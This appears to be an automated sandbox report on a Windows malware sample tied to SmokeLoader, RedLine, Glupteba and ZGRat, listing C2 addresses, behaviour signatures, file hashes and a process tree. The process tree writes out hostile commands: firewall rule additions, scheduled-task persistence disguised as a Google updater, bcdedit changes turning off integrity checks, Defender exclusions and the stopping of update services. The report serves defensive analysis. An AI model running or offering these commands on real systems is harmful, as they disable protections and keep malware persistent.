Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2023 14:56

General

  • Target

    aab85d8dc402cb3c4487d181db202529.exe

  • Size

    37KB

  • MD5

    aab85d8dc402cb3c4487d181db202529

  • SHA1

    658d18524381b7d7e98506e3a4c7a61de2f810c9

  • SHA256

    51ece97ff2a07a17964f2efee643f0be6da2596c4868e0d6e4c41b38efa1db42

  • SHA512

    6b75cea6e737e48f23e336ea4c838c65a13b762976d84d337f0794e3fc97f885e1e131f8041d8142fbf0d709d3a616acc7dd4335efca0f9b79b6f15ad7281f2d

  • SSDEEP

    768:f8FhylJE+hwr5hN7F0I0bQyvUgq65DQVi:f8qlJEQwrDNuIyvD5sV

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://194.49.94.210/fks/index.php

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

@ytlogsbot

C2

194.169.175.235:42691

Extracted

Family

redline

Botnet

LiveTraffic

C2

195.10.205.16:2245

Extracted

Family

smokeloader

Botnet

up3

Signatures

  • Detect ZGRat V1 16 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Modifies boot configuration data using bcdedit 14 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 28 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 11 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Deletes itself
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\aab85d8dc402cb3c4487d181db202529.exe
      "C:\Users\Admin\AppData\Local\Temp\aab85d8dc402cb3c4487d181db202529.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2576
    • C:\Users\Admin\AppData\Local\Temp\B6C1.exe
      C:\Users\Admin\AppData\Local\Temp\B6C1.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2704
    • C:\Users\Admin\AppData\Local\Temp\B932.exe
      C:\Users\Admin\AppData\Local\Temp\B932.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Users\Admin\AppData\Local\Temp\B932.exe
        C:\Users\Admin\AppData\Local\Temp\B932.exe
        3⤵
        • Executes dropped EXE
        PID:2520
    • C:\Users\Admin\AppData\Local\Temp\DB53.exe
      C:\Users\Admin\AppData\Local\Temp\DB53.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Users\Admin\AppData\Local\Temp\Broom.exe
          C:\Users\Admin\AppData\Local\Temp\Broom.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:1672
      • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        PID:1988
        • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
          "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:2612
      • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:560
        • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
          "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          PID:1944
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:1376
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:1328
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Manipulates WinMon driver.
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:2540
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:2440
              • C:\Windows\system32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:2808
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies system certificate store
                  PID:2652
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1576
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3060
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2264
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2576
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2064
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2688
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3044
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2524
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1300
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2720
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1064
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -timeout 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2188
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2920
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:2952
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2496
                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  6⤵
                  • Executes dropped EXE
                  PID:2976
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:1040
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:984
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:2532
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1768
            • C:\Users\Admin\AppData\Local\Temp\tuc3.exe
              "C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2088
              • C:\Users\Admin\AppData\Local\Temp\is-I631F.tmp\tuc3.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-I631F.tmp\tuc3.tmp" /SL5="$40158,3243561,76288,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                PID:1608
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /Query
                  5⤵
                    PID:2532
                  • C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe
                    "C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe" -i
                    5⤵
                    • Executes dropped EXE
                    PID:3008
                  • C:\Windows\SysWOW64\net.exe
                    "C:\Windows\system32\net.exe" helpmsg 28
                    5⤵
                      PID:1036
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 helpmsg 28
                        6⤵
                          PID:1788
                      • C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe
                        "C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe" -s
                        5⤵
                        • Executes dropped EXE
                        PID:636
                  • C:\Users\Admin\AppData\Local\Temp\latestX.exe
                    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
                    3⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:432
                • C:\Users\Admin\AppData\Local\Temp\E4D6.exe
                  C:\Users\Admin\AppData\Local\Temp\E4D6.exe
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2892
                  • C:\Users\Admin\AppData\Local\Temp\is-1JEK8.tmp\E4D6.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-1JEK8.tmp\E4D6.tmp" /SL5="$6011E,3304892,54272,C:\Users\Admin\AppData\Local\Temp\E4D6.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    PID:2588
                • C:\Users\Admin\AppData\Local\Temp\E88F.exe
                  C:\Users\Admin\AppData\Local\Temp\E88F.exe
                  2⤵
                  • Executes dropped EXE
                  PID:756
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=E88F.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:2460
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2460 CREDAT:275457 /prefetch:2
                      4⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2436
                • C:\Users\Admin\AppData\Local\Temp\F06C.exe
                  C:\Users\Admin\AppData\Local\Temp\F06C.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1324
                • C:\Users\Admin\AppData\Local\Temp\F962.exe
                  C:\Users\Admin\AppData\Local\Temp\F962.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2348
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:692
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                  2⤵
                    PID:1860
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:292
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:2700
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:1660
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:2784
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:2940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2124
                    • C:\Windows\system32\schtasks.exe
                      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                      3⤵
                      • Creates scheduled task(s)
                      PID:1324
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                      PID:1964
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -hibernate-timeout-ac 0
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2208
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -hibernate-timeout-dc 0
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1300
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -standby-timeout-ac 0
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2040
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -standby-timeout-dc 0
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2932
                    • C:\Windows\System32\schtasks.exe
                      C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                      2⤵
                        PID:2092
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2728
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                        2⤵
                          PID:2304
                          • C:\Windows\System32\sc.exe
                            sc stop UsoSvc
                            3⤵
                            • Launches sc.exe
                            PID:2160
                          • C:\Windows\System32\sc.exe
                            sc stop WaaSMedicSvc
                            3⤵
                            • Launches sc.exe
                            PID:956
                          • C:\Windows\System32\sc.exe
                            sc stop wuauserv
                            3⤵
                            • Launches sc.exe
                            PID:1384
                          • C:\Windows\System32\sc.exe
                            sc stop bits
                            3⤵
                            • Launches sc.exe
                            PID:1564
                          • C:\Windows\System32\sc.exe
                            sc stop dosvc
                            3⤵
                            • Launches sc.exe
                            PID:1568
                        • C:\Windows\System32\cmd.exe
                          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          2⤵
                            PID:2632
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2184
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1496
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:824
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:932
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                            2⤵
                            • Drops file in System32 directory
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1796
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                              3⤵
                              • Creates scheduled task(s)
                              PID:1232
                          • C:\Windows\System32\conhost.exe
                            C:\Windows\System32\conhost.exe
                            2⤵
                              PID:1644
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              2⤵
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1592
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {9B804D6D-5732-4C27-A215-01D2187CC3B2} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                            • Loads dropped DLL
                            PID:2572
                            • C:\Program Files\Google\Chrome\updater.exe
                              "C:\Program Files\Google\Chrome\updater.exe"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Drops file in Program Files directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2444
                          • C:\Windows\system32\makecab.exe
                            "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231129145731.log C:\Windows\Logs\CBS\CbsPersist_20231129145731.cab
                            1⤵
                            • Drops file in Windows directory
                            PID:1612
                          • C:\Windows\windefender.exe
                            C:\Windows\windefender.exe
                            1⤵
                            • Executes dropped EXE
                            PID:2312

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe

                            Filesize

                            3.8MB

                            MD5

                            5f22b18abe5f6ed6ee7701ed018762f3

                            SHA1

                            120bc488a5abaf573aa326cfaa8f8c9b3546a5de

                            SHA256

                            458386bfa06d242b439bc05efa0739faad0383cfb3e9f17251e582ea7b7d6066

                            SHA512

                            4a04166c4b5c967501e58eba45c22dccd0ea6fc7d685f3b6f57a7b40d546852cf46080c2b0441168b2160100b059390342d264e1f3dc97815eca8028c693c1d2

                          • C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe

                            Filesize

                            3.8MB

                            MD5

                            5f22b18abe5f6ed6ee7701ed018762f3

                            SHA1

                            120bc488a5abaf573aa326cfaa8f8c9b3546a5de

                            SHA256

                            458386bfa06d242b439bc05efa0739faad0383cfb3e9f17251e582ea7b7d6066

                            SHA512

                            4a04166c4b5c967501e58eba45c22dccd0ea6fc7d685f3b6f57a7b40d546852cf46080c2b0441168b2160100b059390342d264e1f3dc97815eca8028c693c1d2

                          • C:\Program Files (x86)\Common Files\MPEG4Binder\mpeg4bind.exe

                            Filesize

                            3.8MB

                            MD5

                            5f22b18abe5f6ed6ee7701ed018762f3

                            SHA1

                            120bc488a5abaf573aa326cfaa8f8c9b3546a5de

                            SHA256

                            458386bfa06d242b439bc05efa0739faad0383cfb3e9f17251e582ea7b7d6066

                            SHA512

                            4a04166c4b5c967501e58eba45c22dccd0ea6fc7d685f3b6f57a7b40d546852cf46080c2b0441168b2160100b059390342d264e1f3dc97815eca8028c693c1d2

                          • C:\Program Files\Google\Chrome\updater.exe

                            Filesize

                            5.6MB

                            MD5

                            bae29e49e8190bfbbf0d77ffab8de59d

                            SHA1

                            4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                            SHA256

                            f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                            SHA512

                            9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                          • C:\Program Files\Google\Chrome\updater.exe

                            Filesize

                            5.6MB

                            MD5

                            bae29e49e8190bfbbf0d77ffab8de59d

                            SHA1

                            4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                            SHA256

                            f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                            SHA512

                            9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                            Filesize

                            65KB

                            MD5

                            ac05d27423a85adc1622c714f2cb6184

                            SHA1

                            b0fe2b1abddb97837ea0195be70ab2ff14d43198

                            SHA256

                            c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                            SHA512

                            6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                            Filesize

                            344B

                            MD5

                            4202e6dfdb38e1e6dce4f40fbab062e1

                            SHA1

                            9bb6a3fa12c9af6b8ad4a8541b5102bec03ef1a5

                            SHA256

                            77712961304826d0d23833639bbf9bc60a5ac10aeb062935ef8a2a32c5bd9f2f

                            SHA512

                            58f6dbf6a28ee1d2ee2017f0ca064e2ded20728fbcd7173ae9fec6b80394eae77908537d1c2702114730d172252624c724835999fe03e805426f116a965d4109

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                            Filesize

                            344B

                            MD5

                            4a875e3232cfe606035aa81306110a40

                            SHA1

                            2f84f90248ad033763f2bb31d8dd188837eb65fa

                            SHA256

                            75f90e3b48c1e41d4ecf4ae633850aea8a2f074e656f934f090cbc3adadd7375

                            SHA512

                            f04eb4edf1f1411df062ed8b337df1333e4786061f7b86276a42b28ef79def891005b91b15557ab50a4b4ec64b794eb7904c8dc35f34320bfbc08d227870040c

